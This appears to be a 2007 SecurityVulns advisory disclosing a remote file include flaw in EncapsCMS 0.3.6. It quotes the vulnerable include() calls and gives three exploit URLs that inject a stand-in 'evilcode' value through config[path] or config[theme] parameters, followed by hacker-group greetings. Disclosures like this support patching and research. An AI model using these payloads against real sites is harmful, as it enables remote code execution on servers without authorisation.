EncapsCMS 0.3.6 (common_foot.php) Remote File Include

2007-01-30T00:00:00
ID SECURITYVULNS:DOC:15919
Type securityvulns
Reporter Securityvulns
Modified 2007-01-30T00:00:00

Description

EncapsCMS 0.3.6 (common_foot.php) Remote File Include

Download Source : http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip

Found By : Tr_ZiNDaN

Location : TurkeY -- #trzindan (at) hotmail (dot) fr [email concealed]

file ; common_foot.php blogs.php admin/gallery_head.php

bugs ;

include($config['path']."bloks.html"); include($config['theme'].'gallery_navi.html'); include($config['path']."idx_foot.html");

exp; /encapscms-0.3.6/common_foot.php?config[path]=evilcode? /encapscms-0.3.6/blogs.php?config[path]=evilcode? /encapscms-0.3.6/admin/gallery_head.php?config[theme]=evilcode?

Thanks; Crackers_Child,str0ke,EL_MuHaMMeD,CyberWolf,EntRika,Blackwolf,,KurtEfendy

Canberx,Chaos,C0ld_Z3r0,Arslan,H0tturk,Sehzade,XYU,Paradox_ MusLim Hackers

T3k T4b4nC4 2oo7~